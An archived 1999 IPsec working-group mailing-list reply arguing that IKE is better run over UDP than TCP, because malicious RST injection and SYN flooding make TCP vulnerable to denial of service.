[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: IKE transport (was INITIAL-CONTACT issues)

To: Sankar@vpnet.com (Sankar Ramamoorthi)
Subject: Re: IKE transport (was INITIAL-CONTACT issues)
From: Dan McDonald <danmcd@Eng.Sun.Com>
Date: Thu, 13 May 1999 13:06:15 -0700 (PDT)
Cc: skelly@redcreek.com, JBurden@caiso.com, sgkelly@ix.netcom.com, kent@bbn.com, Alten@home.com, ipsec@lists.tislabs.com
In-Reply-To: <D899E9E27BE9D211842200805FA67B43016E67@vpnet.com> from "Sankar Ramamoorthi" at May 13, 99 11:57:09 am
Sender: owner-ipsec@lists.tislabs.com

> >that one of the original design requirements was transport independence,
> >and also that a DoS attack might be easier to mount if the transport was
> >TCP, meaning that there would be more (useless) work per packet for TCP. 
> 
> I am not very clear on the DoS attack issues. It is my understanding
> many web servers run into this problem and have addressed the DoS
> attack problem for TCP at a system level.

The web servers have fixed the SYN-flooding attack.

There is nothing to stop malicious injections of RST packets into a TCP
stream.  This is the biggest reason to not use TCP for IKE.  You'll never get
past the 3-way handshake if you have a malicious eavesdropper.

Dan

Follow-Ups:

Re: IKE transport (was INITIAL-CONTACT issues)

From: Paul Koning <pkoning@xedia.com>

References:

RE: IKE transport (was INITIAL-CONTACT issues)

From: Sankar Ramamoorthi <Sankar@vpnet.com>

Prev by Date: RE: IKE transport (was INITIAL-CONTACT issues)
Next by Date: (Fwd) Re: Question on IV for ESP payload
Prev by thread: RE: IKE transport (was INITIAL-CONTACT issues)
Next by thread: Re: IKE transport (was INITIAL-CONTACT issues)
Index(es):
- Main
- Thread